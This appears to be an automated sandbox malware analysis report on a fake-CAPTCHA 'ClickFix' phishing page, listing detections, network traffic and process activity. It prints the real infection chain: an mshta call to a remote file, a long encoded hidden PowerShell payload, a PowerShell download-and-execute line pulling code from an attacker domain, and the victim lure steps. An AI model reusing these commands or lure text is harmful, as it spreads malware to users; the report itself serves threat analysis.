JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADA

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: https://escooterzone.com/play.htmlAvira URL Cloud: detection malicious, Label: malware

        Phishing

        barindex
        Yara detected CAPTCHA Scam ClickFix
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        Source: Yara matchFile source: 1.1.pages.csv, type: HTML
        AI detected suspicious Javascript
        Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://escooterzone.com/play.html... This script demonstrates high-risk behaviors, including dynamic code execution (using `mshta` to potentially run remote scripts) and data exfiltration (copying sensitive information to the clipboard). The script also creates a fake reCAPTCHA popup, which could be part of a phishing attempt. These behaviors indicate a high likelihood of malicious intent, warranting a high-risk score.
        Phishing site or detected (based on various text indicators)
        Source: Chrome DOM: 1.0OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm not a robot
        Source: Chrome DOM: 1.1OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm nat a robat Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
        Source: https://escooterzone.com/play.htmlHTTP Parser: No favicon
        Source: https://escooterzone.com/play.htmlHTTP Parser: No favicon
        Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49718 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49719 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.254:443 -> 192.168.2.17:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.151.250:443 -> 192.168.2.17:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 52.108.8.254:443 -> 192.168.2.17:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.194.161:443 -> 192.168.2.17:49738 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49746 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49748 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49749 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49750 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49751 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.17:49753 version: TLS 1.2
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: global trafficDNS traffic detected: DNS query: escooterzone.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: agiledeals.shop
        Source: global trafficDNS traffic detected: DNS query: e1.foiloverturnarrival.shop
        Source: global trafficDNS traffic detected: DNS query: veilyspen.shop
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49718 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49719 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.254:443 -> 192.168.2.17:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.151.250:443 -> 192.168.2.17:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 52.108.8.254:443 -> 192.168.2.17:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.194.161:443 -> 192.168.2.17:49738 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49746 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49748 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49749 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49750 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49751 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.17:49753 version: TLS 1.2
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 10314
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 10314
        Source: classification engineClassification label: mal100.phis.spyw.evad.win@26/11@12/207
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eieldnfk.kk3.ps1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: HandleInformation
        Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1936,i,3349664962166437789,8395394203860028808,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://escooterzone.com/play.html"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1936,i,3349664962166437789,8395394203860028808,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://agiledeals.shop/s6.pdf # ? ''I am not a robot - reCAPTCHA Verification ID: 2165
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAUQB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuA